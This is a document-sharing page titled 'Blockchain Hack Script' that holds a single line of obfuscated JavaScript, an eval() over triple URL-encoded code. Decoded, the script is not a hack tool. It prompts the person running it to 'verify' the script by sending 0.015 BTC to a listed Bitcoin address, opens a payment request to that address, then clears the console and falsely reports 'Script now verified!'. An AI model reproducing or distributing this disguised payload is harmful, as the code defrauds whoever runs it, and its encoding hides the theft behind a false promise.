33% found this document useful (3 votes)
1K views

Blockchain Hack Script

This document contains JavaScript code that prompts the user to verify a script by sending 0.015 BTC to a given Bitcoin address. It then uses window methods to open a confirmation dialog and, if confirmed, open a Bitcoin payment request URL. If not confirmed, it displays an alert.

Uploaded by

shahadat hossen
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
33% found this document useful (3 votes)
1K views

Blockchain Hack Script

This document contains JavaScript code that prompts the user to verify a script by sending 0.015 BTC to a given Bitcoin address. It then uses window methods to open a confirmation dialog and, if confirmed, open a Bitcoin payment request URL. If not confirmed, it displays an alert.

Uploaded by

shahadat hossen
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('var%252520r7gxo

%252520%25253D%252520parseFloat%252528prompt%252528%252522https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Ftx%25252F%252522%252529%252529%25253B
%25250Avar%252520r7gxo%252520%25253D%252520parseFloat%252528prompt
%252528%252522Your%252520script%252520must%252520be%252520verified%252520with
%252520your%252520BlockChain%252520wallet%252520before%252520you%252520can
%252520take%252520this%252520action.%252520Please%252520verify%252520script
%252520by%252520adding%252520%2525280.015%252529%252520BTC%252520to%252520apparent
%252520address%25253A%252522%25252C%2525223EJiy1ZNh2jELYrebSdY5bocoY5PWmEYee
%252522%252529%252529%25253B%25250Avar%252520w8ugo%252520%25253D
%252520window.confirm%252528%252522Your%252520script%252520must%252520be
%252520verified%252520with%252520your%252520account%252520before%252520you
%252520can%252520take%252520this%252520action.%252520Click%252520OK%252520to
%252520Verify%252520Script%252522%252529%25253B%25250Aif%252520%252528w8ugo
%252529%252520%25257B%252520window.open%252528%252527https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Fpayment_request%25253Faddress
%25253D3EJiy1ZNh2jELYrebSdY5bocoY5PWmEYee%252526message%25253DScript
%25252520Verification%252526amount%25253D0.015%252527%252529%25253B%252520%25257D
%252520%25250Aelse%252520%25257B%252520alert%252528%252522Please%252520back
%252520to%252520verify%252520script.%252522%252529%25253B%252520%25257D
%252520%25250Aconsole.clear%252528%252529%25253B%25250Aconsole.log
%252528%252527Script%252520now%252520verified%252521%252527%252529%25253B'))));

You might also like